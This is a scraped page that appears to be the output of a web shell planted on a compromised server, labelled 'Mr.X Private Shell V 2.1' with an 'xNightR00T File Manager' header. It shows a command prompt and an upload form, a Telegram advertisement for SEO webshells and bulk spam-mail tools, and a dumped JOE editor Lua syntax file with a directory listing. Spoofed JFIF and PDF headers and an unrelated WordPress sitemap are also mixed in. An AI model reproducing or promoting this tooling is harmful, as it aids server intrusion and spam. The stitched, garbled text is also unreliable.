xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# JOE syntax highlight file for LUA

=Idle
=Bad		bold red
=Comment 	green
=Constant 	cyan
=Escape 	bold cyan
=Keyword 	bold

:idle Idle
	*		idle
	"0"		first_digit	recolor=-1
	"1-9"		decimal	recolor=-1
	"."		maybe_float
	"\""		string		recolor=-1
	"'"		char		recolor=-1
	"a-zA-Z_"	ident		buffer
	"-"		maybe_comment
	"["		maybe_lua_string

:maybe_lua_string Idle
	*		idle noeat
	"["		lua_string_0 recolor=-2
	"="		maybe_lua_1

:maybe_lua_1 Idle
	*		idle noeat
	"["		lua_string_1 recolor=-3
	"="		maybe_lua_2

:maybe_lua_2 Idle
	*		idle noeat
	"["		lua_string_2 recolor=-4
	"="		maybe_lua_3

:maybe_lua_3 Idle
	*		idle noeat
	"["		lua_string_3 recolor=-5

:lua_string_0 Constant
	*		lua_string_0
	"]"		lua_string_0_maybe_done

:lua_string_0_maybe_done Constant
	*		lua_string_0 noeat
	"]"		idle

:lua_string_1 Constant
	*		lua_string_1 noeat
	"]"		lua_string_1_maybe_donea

:lua_string_1_maybe_donea	Constant
	*		lua_string_1 noeat
	"="		lua_string_1_maybe_done

:lua_string_1_maybe_done Constant
	*		lua_string_1 noeat
	"]"		idle

:lua_string_2 Constant
	*		lua_string_2 noeat
	"]"		lua_string_2_maybe_donea

:lua_string_2_maybe_donea	Constant
	*		lua_string_2 noeat
	"="		lua_string_2_maybe_doneb

:lua_string_2_maybe_doneb	Constant
	*		lua_string_2 noeat
	"="		lua_string_2_maybe_done

:lua_string_2_maybe_done Constant
	*		lua_string_2 noeat
	"]"		idle

:lua_string_3 Constant
	*		lua_string_3 noeat
	"]"		lua_string_3_maybe_donea

:lua_string_3_maybe_donea	Constant
	*		lua_string_3 noeat
	"="		lua_string_3_maybe_doneb

:lua_string_3_maybe_doneb	Constant
	*		lua_string_3 noeat
	"="		lua_string_3_maybe_donec

:lua_string_3_maybe_donec	Constant
	*		lua_string_3 noeat
	"="		lua_string_3_maybe_done

:lua_string_3_maybe_done Constant
	*		lua_string_3 noeat
	"]"		idle

:maybe_comment Idle
	*		idle noeat
	"-"		maybe_long_comment recolor=-2

:maybe_long_comment Comment
	*		line_comment noeat
	"["		maybe_long_comment_0

:maybe_long_comment_0 Comment
	*		line_comment noeat
	"="		maybe_long_comment_1
	"["		long_comment_0

:maybe_long_comment_1 Comment
	*		ling_comment noeat
	"="		maybe_long_comment_2
	"["		long_comment_1

:maybe_long_comment_2 Comment
	*		line_comment noeat
	"="		maybe_long_comment_3
	"["		long_comment_2

:maybe_long_comment_3 Comment
	*		ling_comment noeat
	"["		long_comment_3

:long_comment_0 Comment
	*		long_comment_0
	"]"		maybe_done_comment_0

:maybe_done_comment_0 Comment
	*		long_comment_0 noeat
	"]"		idle

:long_comment_1 Comment
	*		long_comment_1
	"]"		maybe_done_comment_1a

:maybe_done_comment_1a Comment
	*		long_comment_1 noeat
	"="		maybe_done_comment_1

:maybe_done_comment_1 Comment
	*		long_comment_1 noeat
	"]"		idle

:long_comment_2 Comment
	*		long_comment_2
	"]"		maybe_done_comment_2a

:maybe_done_comment_2a Comment
	*		long_comment_2 noeat
	"="		maybe_done_comment_2b

:maybe_done_comment_2b Comment
	*		long_comment_2 noeat
	"="		maybe_done_comment_2

:maybe_done_comment_2 Comment
	*		long_comment_2 noeat
	"]"		idle

:long_comment_3 Comment
	*		long_comment_3
	"]"		maybe_done_comment_3a

:maybe_done_comment_3a Comment
	*		long_comment_3 noeat
	"="		maybe_done_comment_3b

:maybe_done_comment_3b Comment
	*		long_comment_3 noeat
	"="		maybe_done_comment_3c

:maybe_done_comment_3c Comment
	*		long_comment_3 noeat
	"="		maybe_done_comment_3

:maybe_done_comment_3 Comment
	*		long_comment_2 noeat
	"]"		idle

:line_comment Comment
	*		line_comment
	"\n"		idle

:first_digit Constant
	*		idle	noeat
	"xX"		hex
	"."		float
	"eE"		epart
	"0-7"		octal
	"89"		bad_number	recolor=-1

:bad_number Bad
	*		idle	noeat
	"0-9"		bad_number

:octal Constant
	*		idle	noeat
	"0-7"		octal
	"89"		bad_number	recolor=-1

:hex Constant
	*		idle	noeat
	"0-9A-Fa-f"	hex

:decimal Constant
	*		idle	noeat
	"0-9"		decimal
	"eE"		epart
	"."		float

:maybe_float Constant
	*		idle	recolor=-2	noeat
	"0-9"		float		recolor=-2

:float Constant
	*		idle	noeat
	"eE"		epart
	"0-9"		float

:epart Constant
	*		idle	noeat
	"0-9+\-"	enum

:enum Constant
	*		idle	noeat
	"0-9"		enum

:string	Constant
	*		string
	"\""		idle
	"\\"		string_escape	recolor=-1
	"%"		string_control	recolor=-1

:string_escape Escape
	*		string
	"x"		string_hex1
	"0-7"		string_octal2
	"\n"		string		recolor=-2

:string_hex1 Escape
	*		string		noeat
	"0-9a-fA-F"	string_hex2

:string_hex2 Escape
	*		string		noeat
	"0-9a-fA-F"	string

:string_octal2 Escape
	*		string		noeat
	"0-7"		string_octal3

:string_octal3 Escape
	*		string		noeat
	"0-7"		string

:string_control Escape
	*		string
	"\""		string noeat
	"\n"		reset
	"0-9.\-+ #hjILtz$"	string_control

:char Constant
	*		char
	"\n"		reset
	"'"		idle
	"\\"		char_escape	recolor=-1

:char_escape	Escape
	*		char
	"x"		char_hex1
	"0-7"		char_octal2
	"\n"		char		recolor=-2

:char_hex1 Escape
	*		char		noeat
	"0-9a-fA-F"	char_hex2

:char_hex2 Escape
	*		char		noeat
	"0-9a-fA-F"	char

:char_octal2 Escape
	*		char		noeat
	"0-7"		char_octal3

:char_octal3 Escape
	*		char		noeat
	"0-7"		char

:ident Idle
	*		idle		noeat strings
	"and"		kw
	"end"		kw
	"in"		kw
	"repeat"	kw
	"break"		kw
	"false"		kw
	"local"		kw
	"return"	kw
	"do"		kw
	"for"		kw
	"nil"		kw
	"then"		kw
	"else"		kw
	"function"	kw
	"not"		kw
	"true"		kw
	"elseif"	kw
	"if"		kw
	"or"		kw
	"until"		kw
	"while"		kw
done
	"a-zA-Z0-9_"	ident

:kw Keyword
	*	idle	noeat

Filemanager

Name Type Size Permission Actions
4gl.jsf File 3.37 KB 0644
ada.jsf File 2.5 KB 0644
asm.jsf File 4.07 KB 0644
awk.jsf File 3.2 KB 0644
c.jsf File 11.7 KB 0644
cobol.jsf File 9.45 KB 0644
conf.jsf File 1.3 KB 0644
csh.jsf File 3.68 KB 0644
css.jsf File 1.54 KB 0644
diff.jsf File 7.07 KB 0644
fortran.jsf File 12.77 KB 0644
haskell.jsf File 8.3 KB 0644
html.jsf File 24.99 KB 0644
java.jsf File 3.44 KB 0644
joerc.jsf File 1.65 KB 0644
jsf.jsf File 20.18 KB 0644
jsf_check.jsf File 73 B 0644
lisp.jsf File 364 B 0644
lua.jsf File 5.16 KB 0644
m4.jsf File 1.78 KB 0644
mail.jsf File 2.79 KB 0644
mason.jsf File 133 B 0644
matlab.jsf File 1.14 KB 0644
ocaml.jsf File 9.03 KB 0644
pascal.jsf File 3.45 KB 0644
perl.jsf File 6.43 KB 0644
php.jsf File 4.67 KB 0644
ps.jsf File 5.71 KB 0644
python.jsf File 2.33 KB 0644
rexx.jsf File 1.07 KB 0644
ruby.jsf File 6.3 KB 0644
sed.jsf File 2.22 KB 0644
sh.jsf File 5.39 KB 0644
skill.jsf File 1.49 KB 0644
sml.jsf File 7.85 KB 0644
spec.jsf File 2.44 KB 0644
sql.jsf File 6.82 KB 0644
tcl.jsf File 3.6 KB 0644
tex.jsf File 756 B 0644
troff.jsf File 982 B 0644
verilog.jsf File 4.03 KB 0644
vhdl.jsf File 2.88 KB 0644
xml.jsf File 5 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml